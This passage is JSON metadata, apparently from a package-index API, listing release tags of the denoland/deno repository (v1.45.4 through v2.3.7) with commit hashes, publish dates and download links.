sed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/a